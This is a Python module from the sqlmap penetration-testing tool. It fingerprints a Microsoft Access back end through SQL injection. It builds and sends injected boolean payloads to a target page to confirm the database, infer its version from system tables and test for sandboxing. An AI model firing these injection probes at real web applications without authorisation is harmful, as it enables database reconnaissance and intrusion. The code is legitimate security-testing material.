#!/usr/bin/env python """ $Id$ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/) See the file 'doc/COPYING' for copying permission """ import re from lib.core.agent import agent from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp from lib.core.common import randomInt from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.session import setDbms from lib.core.settings import ACCESS_ALIASES from lib.request.connect import Connect as Request from plugins.generic.fingerprint import Fingerprint as GenericFingerprint class Fingerprint(GenericFingerprint): def __init__(self): GenericFingerprint.__init__(self) def __sandBoxCheck(self): # Reference: http://milw0rm.com/papers/198 retVal = None table = None if kb.dbmsVersion and len(kb.dbmsVersion) > 0: if kb.dbmsVersion[0] in ("97", "2000"): table = "MSysAccessObjects" elif kb.dbmsVersion[0] in ("2002-2003", "2007"): table = "MSysAccessStorage" if table: query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) retVal = "not sandboxed" if result else "sandboxed" return retVal def __sysTablesCheck(self): infoMsg = "executing system table(s) existance fingerprint" logger.info(infoMsg) # Microsoft Access table reference updated on 01/2010 sysTables = { "97": ("MSysModules2", "MSysAccessObjects"), "2000" : ("!MSysModules2", "MSysAccessObjects"), "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs") } # MSysAccessXML is not a reliable system table because it doesn't always exist # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") for version, tables in sysTables.items(): exist = True for table in tables: negate = False if table[0] == '!': negate = True table = table[1:] randInt = randomInt() query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) if result is None: result = False if negate: result = not result exist &= result if not exist: break if exist: return version return None def getFingerprint(self): value = "" wsOsFp = formatFingerprint("web server", kb.headersFp) if wsOsFp: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp) if dbmsOsFp: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " if not conf.extensiveFp: value += "Microsoft Access" return value actVer = formatDBMSfp() + " (%s)" % (self.__sandBoxCheck()) blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] if re.search("-log$", kb.data.banner): banVer += ", logging enabled" banVer = formatDBMSfp([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) return value def checkDbms(self): if conf.dbms in ACCESS_ALIASES: setDbms("Microsoft Access") if not conf.extensiveFp: return True logMsg = "testing Microsoft Access" logger.info(logMsg) payload = agent.fullPayload(" AND VAL(CVAR(1))=1") result = Request.queryPage(payload) if result: logMsg = "confirming Microsoft Access" logger.info(logMsg) payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") result = Request.queryPage(payload) if not result: warnMsg = "the back-end DMBS is not Microsoft Access" logger.warn(warnMsg) return False setDbms("Microsoft Access") if not conf.extensiveFp: return True kb.dbmsVersion = [self.__sysTablesCheck()] return True else: warnMsg = "the back-end DMBS is not Microsoft Access" logger.warn(warnMsg) return False